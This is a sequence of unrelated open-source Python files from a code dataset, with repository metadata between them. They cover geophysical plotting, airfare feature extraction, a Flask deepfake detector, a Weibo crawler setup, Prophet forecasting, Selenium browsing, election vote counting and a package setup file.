np.ones(len(dataTDIP.data('m')))\n valid[id2rmv] = 0\n\n \n #if remove == True:\n #dataTDIP.data.set('valid',valid)\n #dataTDIP.MA = dataTDIP.MA[:, dataTDIP.data['valid'].array()==1]\n #dataTDIP.data.removeInvalid()\n\n return dataTDIP, valid\n \n#%%\n# if Nfix is not None:\n# fig, ax = plt.subplots(nrows=1, ncols=4)\n# for i, g in enumerate(range(3,20,5)):\n# ax[i].set_ylabel('y [m]',fontsize=15)\n# ax[i].set_xlabel('x [m]',fontsize=15)\n# sc=ax[i].scatter(coordE_f[:,1], coordE_f[:,2], c=Obs('M'+str(g)).array(), \n# cmap ='coolwarm',s=5e2, vmin=-100)\n# cbar = plt.colorbar(sc,ax=ax[i]) \n# ax[i].set_title('Gate t:' + str(IPcurves.t[g]) + 's')\n# for ie in range(len(sensors[:,0])):\n# ax[i].annotate(str(ie+1), (sensors[ie,0],sensors[ie,1]))\n\n\n# #%%\n\n\n# if Nfix is not None:\n# fig, ax = plt.subplots(nrows=1, ncols=2)\n# ax[0].scatter(sensors[:,0],sensors[:,1],color='k',marker='.',label='pot. elec')\n# ax[0].scatter(sensors[B,0],sensors[B,1],color='b',marker='v',label='B. elec')\n# ax[0].scatter(sensors[A,0],sensors[A,1],color='r',marker='v',label='A. elec')\n# ax[0].scatter(sensors[Nfix,0],sensors[Nfix,1],color='g',marker='v',label='Nfix. elec')\n# for i in range(len(sensors[:,0])):\n# ax[0].annotate(str(i+1), (sensors[i,0],sensors[i,1]))\n \n# ax[0].legend(loc=\"upper right\") \n# ax[0].set_xlabel('x (m)')\n# ax[0].set_ylabel('y (m)')\n \n# # plot secondary voltage distribuion along a given profile\n# abmn=[]\n# for nn in range(len(IPcurves_f.data['a'])):\n# abmn.append([int(IPcurves_f.data(t)[nn]+1) for t in ['a', 'b', 'm', 'n']])\n# abmn = np.vstack(abmn)\n \n# # define the profile\n# pelecs = np.array([0,1,2,3,4,5,6,7]) +32\n# pelecs = np.array([0,1,2,3,4,5,6,7]) +16\n# pelecs = np.array([0,1,2,3,4,5,6,7]) +32\n# pelecs = np.array([5,13,21,29,37,45,53,61,69])\n \n# idp = np.zeros(len(pelecs))\n# Vg = np.zeros(20)\n# Vi = np.zeros([20,len(pelecs)])\n# for i,p in enumerate(pelecs):\n# if(len(np.where(p+1==abmn)[0]))>0:\n# idp[i]= np.where(p+1==abmn)[0][0]\n# for g in range(20):\n# gatestr = 'M' + str(g+1)\n# Vg[g] = IPcurves_f.data[gatestr].array()[int(idp[i])]\n# Vi[:,i] = Vg\n \n# for g in range(3,20,5):\n# ax[1].plot(pelecs+1,Vi[g,:],'o-', alpha=0.5, \n# label='Gate t:' + str(IPcurves.t[g]) + 's')\n# plt.legend() \n# plt.xlabel('# Electrode')\n# plt.ylabel('Secondary voltage (mV)')\n# plt.xticks(pelecs+1)\n\n# if Nfix is not None:\n# fig, ax = plt.subplots(nrows=1, ncols=2)\n# sc=ax[0].scatter(coordE_f[:,1], coordE_f[:,2], c=abs(Obs('r').array()), \n# cmap ='coolwarm',s=5e2, vmin=0.1, vmax=200) # norm=matplotlib.colors.Normalize()\n# cbar = plt.colorbar(sc,ax=ax[0])\n# cbar.set_label('V') \n# ax[0].scatter(sensors[:,0],sensors[:,1],color='k',marker='.',label='pot. elec')\n# ax[0].scatter(sensors[B,0],sensors[B,1],color='b',marker='v',label='B. elec')\n# ax[0].scatter(sensors[A,0],sensors[A,1],color='r',marker='v',label='A. elec')\n# ax[0].scatter(sensors[Nfix,0],sensors[Nfix,1],color='g',marker='v',label='Nfix. elec')\n# for i in range(len(sensors[:,0])):\n# ax[0].annotate(str(i+1), (sensors[i,0],sensors[i,1])) \n# ax[0].set_ylabel('y [m]',fontsize=15)\n# ax[0].set_xlabel('x [m]',fontsize=15)\n# sc=ax[1].scatter(coordE_f[:,1], coordE_f[:,2], c=Obs('gm').array(), \n# cmap ='coolwarm',s=5e2, norm=matplotlib.colors.Normalize())\n# cbar = plt.colorbar(sc,ax=ax[1]) \n# ax[1].set_title('Global chargeability')\n# ","repo_name":"BenjMy/rhizotron_tdip","sub_path":"rhizo/utils_rhizo.py","file_name":"utils_rhizo.py","file_ext":"py","file_size_in_byte":28652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14939867652","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport os\n\nclass FeatureExtractor(object):\n def __init__(self):\n pass\n\n def fit(self, X_df, y_array):\n pass\n\n\n def quarter(self, m):\n if m <= 3:\n return 1\n elif m <= 6:\n return 2\n elif m <= 9:\n return 3\n return 4\n \n def trouver_airport(self, i):\n airports = {'ATL':0, 'ORD':1, 'LAX':2, 'DFW':3, 'DEN':4, 'JFK':5, 'SFO':6, 'CLT':7, 'LAS':8, 'PHX':9, 'IAH':10, 'MIA':11, 'MCO':12, 'EWR':13, 'SEA':14, 'MSP':15, 'DTW':16, 'PHL':17, 'BOS':18, 'LGA':19}\n for airport in airports:\n if airports[airport] == i:\n return airport\n pass\n\n\n def somme(self, tab):\n n,m = tab.shape\n t = 0\n for i in range(n):\n for j in range(m):\n t += tab[i][j]\n return t\n \n def completer_trous(self, Xs):\n airports = {'ATL':0, 'ORD':1, 'LAX':2, 'DFW':3, 'DEN':4, 'JFK':5, 'SFO':6, 'CLT':7, 'LAS':8, 'PHX':9, 'IAH':10, 'MIA':11, 'MCO':12, 'EWR':13, 'SEA':14, 'MSP':15, 'DTW':16, 'PHL':17, 'BOS':18, 'LGA':19}\n nb = len(airports)\n nb_quarters = 4\n nb_years = 3\n nb_features = 8\n \n Ys = np.zeros(nb*nb*nb_quarters*nb_years*nb_features, dtype = int)\n Ys = Ys.reshape((nb* nb* nb_quarters* nb_years, nb_features))\n ll = nb* nb* nb_quarters* nb_years\n l = len(Xs)\n \n tab = np.zeros(nb*nb*nb_quarters*nb_years)\n tab = tab.reshape((nb, nb, nb_quarters, nb_years))\n total_fares = np.zeros(nb*nb)\n total_fares = total_fares.reshape((nb, nb))\n total_pax = np.zeros(nb*nb*nb_quarters*nb_years)\n total_pax = total_pax.reshape((nb, nb, nb_quarters, nb_years))\n average_fares = np.zeros(nb*nb*nb_quarters*nb_years)\n average_fares = average_fares.reshape((nb, nb, nb_quarters, nb_years))\n \n #Création du tableau de tous les trajets et remplissage\n x = 0\n for i in range(l):\n ligne = Xs[i]\n orig = airports[ligne[1]]\n dest = airports[ligne[2]]\n fares = ligne[5]\n av_fares = ligne[6]\n pax = ligne[4]\n quart = ligne[3]\n year = ligne[7]\n tab[orig][dest][quart-1][year-2011] += 1\n total_fares[orig][dest] += fares\n average_fares[orig][dest][quart-1][year-2011] = av_fares\n total_pax[orig][dest][quart-1][year-2011] = pax\n x += 1\n \n\n # Remplissage des trous\n x = 0\n for i in range(nb):\n for j in range(nb):\n for y in range(nb_years):\n for q in range(nb_quarters):\n Ys[x][0] = int(x) + 1\n Ys[x][1] = i\n Ys[x][2] = j\n Ys[x][7] = int(y) + 2011\n Ys[x][3] = int(q) + 1\n if (tab[i][j][q][y] > 0):\n Ys[x][4] = int(pax)\n Ys[x][5] = int(fares)\n Ys[x][6] = fares / pax\n else:\n Ys[x][5] = total_fares[i][j] / 7\n Ys[x][4] = self.somme(total_pax[i][j][:][:]) / 7\n Ys[x][6] = Ys[x][5] / Ys[x][4]\n x += 1\n return Ys\n \n def transform(self, X_df):\n X_encoded = X_df\n path = os.path.dirname(__file__)\n \n airports = {'ATL':0, 'ORD':1, 'LAX':2, 'DFW':3, 'DEN':4, 'JFK':5, 'SFO':6, 'CLT':7, 'LAS':8, 'PHX':9, 'IAH':10, 'MIA':11, 'MCO':12, 'EWR':13, 'SEA':14, 'MSP':15, 'DTW':16, 'PHL':17, 'BOS':18, 'LGA':19}\n \n #uncomment the line below in the submission\n #path = os.path.dirname(__file__)\n #data_weather = pd.read_csv(os.path.join(path, \"data_weather.csv\"))\n #data_weather = pd.read_csv(\"data_weather.csv\")\n \n air_fares = pd.read_csv(os.path.join(path, \"AirFares2012Q1to2013Q2.csv\"), sep = ';')\n tab = air_fares.values\n # On complète les quarters qui n'existe pas sur un traje par la moyenne des air_fares sur le trajet\n data_air_fares = self.completer_trous(tab)\n n = len(data_air_fares)\n m = len(data_air_fares[0])\n\n data_air_fares = np.c_[data_air_fares, np.ones(n, dtype = str)]\n\n # définition d'une clé pour le join : ORG DES Quarter Year\n for i in range(n):\n data_air_fares[i][m] = str((data_air_fares[i][1])) + ' ' + str(data_air_fares[i][2]) + ' ' + str(data_air_fares[i][3]) + ' ' + str(data_air_fares[i][7])\n data_air_fares = np.delete(data_air_fares, (0), axis=1)\n \n X_air_fares = pd.DataFrame(data_air_fares[:], columns=['ORIGIN', 'DEST', 'Quarter', 'TotalPax', 'TotalFare', 'AverageFare', 'Year', 'Ref'])\n X_air_fares = X_air_fares.drop('ORIGIN', axis=1)\n X_air_fares = X_air_fares.drop('DEST', axis=1)\n X_air_fares = X_air_fares.drop('Quarter', axis=1)\n X_air_fares = X_air_fares.drop('TotalPax', axis=1)\n X_air_fares = X_air_fares.drop('TotalFare', axis=1)\n X_air_fares = X_air_fares.drop('Year', axis=1)\n \n X_air_fares.to_csv(path_or_buf='Result.csv', sep=';')\n\n \n X_encoded['DateOfDeparture'] = pd.to_datetime(X_encoded['DateOfDeparture'])\n X_encoded['year'] = X_encoded['DateOfDeparture'].dt.year\n X_encoded['month'] = X_encoded['DateOfDeparture'].dt.month\n #X_encoded['day'] = X_encoded['DateOfDeparture'].dt.day\n X_encoded['weekday'] = X_encoded['DateOfDeparture'].dt.weekday\n X_encoded['week'] = X_encoded['DateOfDeparture'].dt.week\n X_encoded['n_days'] = X_encoded['DateOfDeparture'].apply(lambda date: (date - pd.to_datetime(\"2011-09-01\")).days)\n\n X_encoded = X_encoded.join(pd.get_dummies(X_encoded['year'], prefix='y'))\n X_encoded = X_encoded.join(pd.get_dummies(X_encoded['month'], prefix='m'))\n #X_encoded = X_encoded.join(pd.get_dummies(X_encoded['day'], prefix='d'))\n X_encoded = X_encoded.join(pd.get_dummies(X_encoded['weekday'], prefix='wd'))\n X_encoded = X_encoded.join(pd.get_dummies(X_encoded['week'], prefix='w'))\n\n \n #X_weather = data_weather[['Date', 'AirPort', 'Max TemperatureC']]\n #X_weather = X_weather.rename(columns={'Date': 'DateOfDeparture', 'AirPort': 'Arrival'})\n #X_encoded = X_encoded.set_index(['DateOfDeparture', 'Arrival'])\n #X_weather = X_weather.set_index(['DateOfDeparture', 'Arrival'])\n #X_encoded = X_encoded.join(X_weather).reset_index()\n \n X_encoded = X_encoded.join(pd.get_dummies(X_encoded['Departure'], prefix='d'))\n X_encoded = X_encoded.join(pd.get_dummies(X_encoded['Arrival'], prefix='a'))\n \n X_encoded['quarter'] = X_encoded['month'].apply(lambda m: self.quarter(m))\n X_encoded['ori'] = X_encoded['Departure'].apply(lambda a: airports[a])\n X_encoded['dest'] = X_encoded['Arrival'].apply(lambda a: airports[a])\n\n X_encoded['Ref'] = X_encoded['ori'].apply(lambda a: str(a)) + ' ' + X_encoded['dest'].apply(lambda b: str(b)) + ' ' + X_encoded['quarter'].apply(lambda b: str(b)) + ' ' + X_encoded['year'].apply(lambda b: str(b))\n \n X_encoded = X_encoded.merge(X_air_fares, how='left',\n left_on=['Ref'], \n right_on=['Ref'], sort=False)\n \n X_encoded = X_encoded.drop('Ref', axis=1)\n #X_encoded = X_encoded.drop('quarter', axis=1)\n #X_encoded = X_encoded.drop('ori', axis=1)\n #X_encoded = X_encoded.drop('dest', axis=1)\n \n X_encoded['AverageFare'] = X_encoded['AverageFare'].astype(float)\n \n #X_encoded = X_encoded.drop('AverageFare', axis=1)\n \n X_encoded = X_encoded.drop('Departure', axis=1)\n X_encoded = X_encoded.drop('Arrival', axis=1)\n X_encoded = X_encoded.drop('month', axis=1)\n X_encoded = X_encoded.drop('DateOfDeparture', axis=1)\n X_encoded = X_encoded.drop('year', axis=1)\n #X_encoded = X_encoded.drop('weekday', axis=1)\n #X_encoded = X_encoded.drop('week', axis=1)\n X_encoded = X_encoded.drop('std_wtd', axis=1)\n X_encoded = X_encoded.drop('WeeksToDeparture', axis=1) \n \n #X_encoded.fillna(0)\n #print X_encoded.head()\n \n X_array = X_encoded.values\n return X_array","repo_name":"AD75006/DataCampAma","sub_path":"feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32831609021","text":"from flask import Flask, render_template, jsonify\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import preprocessing, models, backend as K\nimport numpy as np\nimport cv2\nfrom mtcnn import MTCNN\nimport base64\n\napp = Flask(__name__)\n\nmodel = load_model('deepfake-detection2.h5')\n\n@app.route('/predict')\ndef predict():\n input_shape = (160,160,3)\n mtcnn = MTCNN()\n # 영상 불러오기\n videos_path = 'test1.mp4'\n vid_name = videos_path.split('/')[-1].split('.')[0]\n # 프레임으로 나눠서 저장\n cap = cv2.VideoCapture(videos_path)\n frame = 0\n detect_face_num = 0\n\n #heat_images = []\n\n\n\n def get_face_coord(img):\n # 얼굴 detect\n face = mtcnn.detect_faces(img)\n # 얼굴 없으면 다음 프레임\n if not face:\n return None\n # 얼굴 위치\n x1,y1,w,h = face[0]['box']\n x2 = min(x1+w, img.shape[1])\n y2 = min(y1+h, img.shape[0])\n x1 = max(x1, 0)\n y1 = max(y1, 0)\n return [y1,y2,x1,x2]\n\n\n def crop_img(face_coord):\n # 이미지 자르기\n y1,y2,x1,x2 = face_coord\n crop_img = img[y1:y2, x1:x2]\n crop_img = cv2.resize(crop_img, (input_shape[0], input_shape[1]))\n return crop_img\n\n\n @tf.function\n def predict_and_generate_heatmap(model, img_tensor):\n # 프레임 가져와서 히트맵 표시\n conv_layer = model.get_layer(\"conv_7b\")\n heatmap_model = models.Model([model.inputs], [conv_layer.output, model.output])\n # # Get gradient of the winner class w.r.t. the output of the (last) conv. layer\n with tf.GradientTape() as gtape:\n conv_output, predictions = heatmap_model(img_tensor)\n loss = predictions[:, tf.math.argmax(predictions[0])]\n grads = gtape.gradient(loss, conv_output)\n pooled_grads = K.mean(grads, axis=(0, 1, 2))\n\n heatmap = tf.reduce_mean(tf.multiply(pooled_grads, conv_output), axis=-1)\n heatmap = tf.math.maximum(heatmap, 0)\n \n max_heat = tf.math.reduce_max(heatmap)\n # if max_heat == 0:\n # max_heat = 1e-10\n heatmap /= max_heat\n return heatmap, predictions[0][1]\n\n\n\n\n pred = 0\n while(cap.isOpened()):\n if frame > 10 or detect_face_num > 5:\n break\n\n ret, img = cap.read()\n if ret == False:\n break\n \n #img = tf.convert_to_tensor(img)\n face_coord = get_face_coord(img)\n if not face_coord:\n continue\n detect_face_num+=1\n\n crop_image = crop_img(face_coord)\n\n # 이미지 전처리 및 예측\n img_tensor = (crop_image.flatten() / 255.0).reshape(-1, input_shape[0], input_shape[1], 3)\n img_tensor = tf.convert_to_tensor(img_tensor)\n\n heatmap, predict = predict_and_generate_heatmap(model, img_tensor)\n heatmap = np.array(heatmap)\n heatmap2 = cv2.resize(heatmap, (img_tensor.shape[2], img_tensor.shape[1]))\n heatmap2 = np.uint8(255 * heatmap2)\n heatmap2 = cv2.applyColorMap(heatmap2, cv2.COLORMAP_JET)\n hif = .5\n superimposed_img = heatmap2 * hif + crop_image\n \n #heat_images.append(superimposed_img.tolist())\n pred += predict\n\n output = f'output_{vid_name}_{detect_face_num}.jpeg'\n cv2.imwrite(output, superimposed_img)\n\n # 정확도 판별(평균)\n if detect_face_num:\n acc = pred/detect_face_num\n else:\n acc = 0\n acc = acc.numpy()\n acc = float(acc)\n\n # 정확도, 이미지 array -> json\n return jsonify(acc=acc) # ,heat_images=heat_images\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)","repo_name":"GMIMG/Deepfake-Detection-Challenge-Chieer","sub_path":"web/flask/flask/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"214802276","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nFile Description: \nAuthor: nghuyong\nMail: nghuyong@163.com\nCreated Time: 2020/4/15\n\"\"\"\nimport sys\n\nimport redis\n\nfrom settings import INIT_USERS\nfrom weibo.items import WeiboItem\nfrom weibo.settings import REDIS_URL\nfrom weibo.utils import redis_utils\nfrom weibo.utils.redis_utils import RedisClient\n\nredis_client = redis.Redis.from_url(REDIS_URL)\n\n\ndef redis_init(start_url, urls):\n r = RedisClient().db\n print(f'Add urls to {start_url}')\n for url in urls:\n r.sadd(start_url, url)\n\n\ndef init_m_weibo_redis_spider():\n redis_utils.bak_weibo_filter()\n urls = []\n for init_weibo in INIT_USERS:\n urls.append(WeiboItem.url.format(uid=init_weibo, page=1))\n # urls.append(WeiboItem.url.format(uid=\"5675889356\", page=1))\n redis_init(WeiboItem.start_url, urls)\n\n\nif __name__ == '__main__':\n mode = sys.argv[1]\n mode_to_fun = {\n # 'user_detail': init_m_user_detail_redis_spider,\n # 'user_attention_tag': init_m_user_attention_tag_redis_spider,\n # 'user_attention_member': init_m_user_attention_member_redis_spider,\n # 'comment': init_m_comment_redis_spider,\n # 'repost': init_m_repost_redis_spider,\n 'weibo': init_m_weibo_redis_spider,\n # 'user_weibo': init_m_user_weibo_redis_spider,\n # 'attitude': init_m_attitude_redis_spider,\n }\n mode_to_fun[mode]()\n","repo_name":"rensuperk/weibo_crawler","sub_path":"weibo/redis_init.py","file_name":"redis_init.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365730614","text":"from typing import TypedDict, Unpack\n\nfrom apps.anime.tasks import set_field_color\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom .models import AnimeModel\n\n\nclass DjangoInstance(TypedDict):\n instance: AnimeModel\n\n\n@receiver(post_save, sender=AnimeModel)\ndef banner_background_color_handler(\n **kwargs: Unpack[DjangoInstance],\n) -> None:\n instance = kwargs[\"instance\"]\n\n # Set Background Banner Image Color\n if (hasattr(instance, \"banner\")) and not instance.banner_background_color:\n set_field_color.delay(\n instance.pk,\n \"banner_background_color\",\n \"banner\",\n )\n\n # Set Background Cover Image Color\n if (hasattr(instance, \"cover\")) and not instance.cover_background_color:\n set_field_color.delay(\n instance.pk,\n \"cover_background_color\",\n \"cover\",\n )\n","repo_name":"baseplate-admin/CoreProject","sub_path":"backend/django_core/apps/anime/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"74146973492","text":"\"\"\"\nCommand line argument options parser.\nAdopted and modified from https://github.com/pytorch/examples/blob/master/imagenet/main.py\nUsage with two minuses \"- -\". Options are written with a minus \"-\" in command line, but\nappear with an underscore \"_\" in the attributes' list.\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='PyTorch Intrinsic Ordering Dataset Metrics Correlation')\n\n# Dataset and loading\nparser.add_argument('--dataset', default='CIFAR10', help='name of dataset')\nparser.add_argument('-j', '--workers', default=4, type=int, help='number of data loading workers (default: 4)')\nparser.add_argument('-p', '--patch-size', default=32, type=int, help='patch size for crops (default: 32)')\n\nparser.add_argument('--multilabel', default=False, action='store_true', help='if dataset has multiple'\n ' labels per image')\nparser.add_argument('--save-prob-vector', default=False, action='store_true', help='for single label:'\n 'save whole prob vector and not only max')\nparser.add_argument('--randomize-labels', default=False, action='store_true',\n help='randomize labels for every batch')\nparser.add_argument('-cp', '--corrupt-prob', default=0., type=float, help='label corruption/randomization probability/level (default: 0.)')\n\n# Architecture and weight-init\nparser.add_argument('-a', '--architecture', default='Net', help='model architecture')\nparser.add_argument('--weight-init', default='kaiming-normal',\n help='weight-initialization scheme (default: kaiming-normal)')\n\n# Training hyper-parameters\nparser.add_argument('--device-id', default=0, type=int, help='gpu device id on which to train')\nparser.add_argument('--num-networks', default=5, type=int, help='number of networks to train')\nparser.add_argument('--epochs', default=120, type=int, help='number of total epochs to run')\nparser.add_argument('-b', '--batch-size', default=128, type=int, help='mini-batch size (default: 128)')\nparser.add_argument('-lr', '--learning-rate', default=1e-3, type=float, help='initial learning rate (default: 1e-3)')\nparser.add_argument('--sgd-momentum', default=0.9, type=float, help='SGD momentum (default: 0.9)')\nparser.add_argument('-bn', '--batch-norm', default=1e-5, type=float, help='batch normalization (default 1e-5)')\nparser.add_argument('-wd', '--weight-decay', default=1e-5, type=float, help='weight decay (default 1e-5)')\n\nparser.add_argument('--optimizer-type', default='SGD', help='Adam or SGD')\nparser.add_argument('--scheduler-type', default='', help='scheduler type: CosineAnnealingLR or OneCycleLR')\nparser.add_argument('--eta-min', default=5e-4, type=float, help='min learning rate (default: 5e-4)')\nparser.add_argument('--step-gamma', default=0.2, type=float, help='StepLR: factor to reduce lr every step-size steps (default: 0.2)')\nparser.add_argument('--step-size', default=10, type=float, help='StepLR: step-size (default: 10)')\n\n# Resuming training\nparser.add_argument('--resume', default=False, action='store_true',\n help='if resume training')\n\n# Computation steps\nparser.add_argument('--save-dir', default='', help='directory with results to save/saved results')\nparser.add_argument('--compute-dataset-metrics', default=False, action='store_true', help='compute dataset metrics, like entropy')\nparser.add_argument('--train-networks', default=False, action='store_true', help='train several networks')\nparser.add_argument('--visualize-results', default=False, action='store_true', help='visualize agreement '\n 'and correlation with'\n 'dataset metrics')\nparser.add_argument('--agreement-type', default='single_label',\n help='defines which kind of multilabel agreement/accuracy to use')","repo_name":"ccc-frankfurt/intrinsic_ordering_nn_training","sub_path":"cmdparser.py","file_name":"cmdparser.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"2999600651","text":"#open file \n# r - read mode\n# w - write mode\n# a - append mode (append to the end of the file)\n# r+ - read and write\n\n# create a new file (if file does not exist) in append mode\nmy_opened_file = open(\"myfile.txt\", \"a\")\n# add a new line in the file\nmy_opened_file.write(\"\\ntest me\") \nmy_opened_file.close()\n\n\n# create a new file (if file does not exist) in write mode\nmy_new_file = open(\"my_new_file\", \"w\")\n# add contents to new file, if file exists it will overwrite its contents\nmy_new_file.write(\"my new content\")\nmy_new_file.close()","repo_name":"shadibdair/Python","sub_path":"Day 12 - 09.01.2019/01-writing-files.py","file_name":"01-writing-files.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7225520717","text":"from datetime import datetime\nimport typing\n\nimport pandas as pd\n\nimport prophet\n\nimport holidays\n\n\ndef run_forecast(\n dataset: pd.DataFrame, config: dict\n) -> typing.Tuple[pd.DataFrame, pd.DataFrame]:\n target = config[\"target\"]\n\n fit_parameters = config[\n \"forecast_parameters\"\n ].copy() # you must force a copy here or it assigns a reference to\n # the dictionary\n\n if config[\"holidays\"]:\n holiday_df = pd.DataFrame.from_dict(\n holidays.US(years=[2017, 2018, 2019, 2020, 2021]).items()\n ) # type: pd.DataFrame\n holiday_df.rename({0: \"ds\", 1: \"holiday\"}, inplace=True, axis=1)\n fit_parameters[\"holidays\"] = holiday_df\n fit_parameters[\"growth\"] = \"flat\"\n\n model = prophet.Prophet(**fit_parameters, mcmc_samples=0)\n\n if target == \"mobile\":\n step_change_date = datetime.strptime(\"2021-1-24\", \"%Y-%m-%d\").date()\n dataset[\"regressor_00\"] = dataset.apply(\n lambda x: 0 if x[\"ds\"] <= step_change_date else 1, axis=1\n ) # because of a step change in the data mobile data needs this\n\n model.add_regressor(name=\"regressor_00\")\n\n fit_model = model.fit(dataset)\n\n _ = fit_model.predict() # type: pd.DataFrame\n\n periods = remaining_days(dataset[\"ds\"].max(), config[\"stop_date\"])\n\n future = fit_model.make_future_dataframe(periods=periods) # type: pd.DataFrame\n\n if target == \"mobile\":\n future[\"regressor_00\"] = 1\n\n future_values = fit_model.predict(future)\n\n future_values = future_values[future_values[\"ds\"] > datetime.today()]\n\n uncertainty_samples_raw = fit_model.predictive_samples(future)\n\n uncertainty_samples = pd.DataFrame.from_records(uncertainty_samples_raw[\"yhat\"])\n\n uncertainty_samples[\"ds\"] = future[\"ds\"]\n\n return future_values, uncertainty_samples\n\n\ndef remaining_days(max_day, end_date) -> int:\n if type(max_day) == str:\n parts = [int(part) for part in max_day.split(\"-\")]\n max_day = datetime(year=parts[0], month=parts[1], day=parts[2]).date()\n\n if type(end_date) == str:\n parts = [int(part) for part in end_date.split(\"-\")]\n end_date = datetime(year=parts[0], month=parts[1], day=parts[2]).date()\n\n return (end_date - max_day).days\n","repo_name":"xluo-ds/docker-etl","sub_path":"jobs/kpi-forecasting/kpi-forecasting/Utils/FitForecast.py","file_name":"FitForecast.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"6204426301","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nbase_url=\"https://www.amazon.in\"\r\n\r\nsearch_term=input ('What do you want to search for in amazon ?')\r\n\r\ndriver=webdriver.Chrome(executable_path=r'C:/Users/dheem/Downloads/chromedriver_win32/chromedriver.exe')\r\n\r\ndriver.maximize_window()\r\n\r\ndriver.implicitly_wait(10) #10 is in seconds\r\n\r\ndriver.get(base_url)\r\n\r\nassert \"Amazon\" in driver.title\r\n\r\nsearchTextBox=driver.find_element_by_id(\"twotabsearchtextbox\")\r\n\r\nsearchTextBox.clear()\r\n\r\nsearchTextBox.send_keys(search_term)\r\n\r\nsearchTextBox.send_keys(Keys.RETURN)\r\n\r\nassert f\"Amazon.in:{search_term}\" in driver.title\r\n\r\nassert \"No results found.\" not in driver.page_source\r\n\r\ndriver.close()","repo_name":"dheemanthrk/yo","sub_path":"amazon1.py","file_name":"amazon1.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7650729013","text":"\n#load the modules\nimport csv\nimport os\n\n#total number of votes\n#number of candidates\n# Total votes for each candidate\n# percentage of votes each candiadate got\n# Winner of the election\n\n#Read the election_results.csv from the Resources folder in Asynch\n#Read file using direct method with WITH statement or indirectly with the open()\n#file_to_load = 'Resources/Election_results.csv'\n#using the os method to load a file from indirect path\nfile_to_load = os.path.join(\"Resources\",\"Election_results.csv\")\n#convert to txt file\nfile_to_save = os.path.join(\"analysis\",\"Election_analysis.txt\")\n\n#initialize the total vote count\ntotal_votes = 0\ncandidate_options = []\ncandidate_votes = {}\nwinning_count = 0\nwinning_percentage = 0\nwinning_candidate = 0\n\nwith open(file_to_load) as election_data:\n#election_data = open(file_to_load,'r')\n\n #print(election_data)\n#election_data.close()\n\n\n#with open(file_to_save, \"w\") as txtfile:\n#outfile.write(\"Hello\")\n#outfile.close()\n#txtfile.write\n\n#Read and analyze the data\n file_reader = csv.reader(election_data)\n#print header row\n headers=next(file_reader)\n print(headers)\n\n for row in file_reader:\n total_votes += 1\n candidate_name = row[2]\n if candidate_name not in candidate_options:\n\n candidate_options.append(candidate_name)\n candidate_votes[candidate_name] = 0\n candidate_votes[candidate_name] += 1\n\nwith open(file_to_save,\"w\") as txt_file:\n # Print the final vote count to the terminal.\n election_results = (\n f\"\\nElection Results\\n\"\n f\"-------------------------\\n\"\n f\"Total Votes: {total_votes:,}\\n\"\n f\"-------------------------\\n\")\n print(election_results, end=\"\")\n # Save the final vote count to the text file.\n txt_file.write(election_results)\n\n for candidate_name in candidate_votes:\n votes = candidate_votes[candidate_name]\n votes_percentage = float(votes)/float(total_votes) * 100\n #print(f\"{candidate_name}: received {round(votes_percentage,2)}% of the votes. \")\n #print(f\"{candidate_name}: {votes_percentage:.1f}%({votes:,})\\n\")\n\n if (votes > winning_count) and (votes_percentage > winning_percentage):\n winning_votes = votes\n winning_percentage = round(votes_percentage,2)\n winning_candidate = candidate_name \n\n winning_candidate_summary = (\n f\"----------------------\\n\"\n f\"winner: {winning_candidate}\\n\"\n f\"winning vote_count : {winning_votes:,}\\n\"\n f\"winning percentage : {winning_percentage:,}\\n\"\n f\"----------------------\\n\")\n\n print(winning_candidate_summary)\n\n\n\n #print(total_votes)\n #print(candidate_options)\n #print(candidate_votes)\n txt_file.write(winning_candidate_summary)\n\n\n\n\n","repo_name":"klkanchi/Election-Analysis","sub_path":"Pypoll.py","file_name":"Pypoll.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27555391909","text":"# -*- coding: utf-8 -*-\n\"\"\"Setup file for easyEEZYbotARM\n\"\"\"\n\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\n\nsetup(\n name=\"easyEEZYbotARM\",\n version=\"0.0.1\",\n description=\"A python controller (3 dimensions inverse and forward kinematics) for the EEZYbotARM (MK1,MK2,MK3) movement\",\n license=\"MIT\",\n long_description=long_description,\n author=\"Ben Money-Coomes\",\n author_email=\"ben.money@gmail.com\",\n url=\"https://github.com/meisben\",\n package_dir={'': 'python_packages'},\n packages=[\"easyEEZYbotARM\", ],\n install_requires=[\"scipy\", \"numpy\", \"matplotlib\", 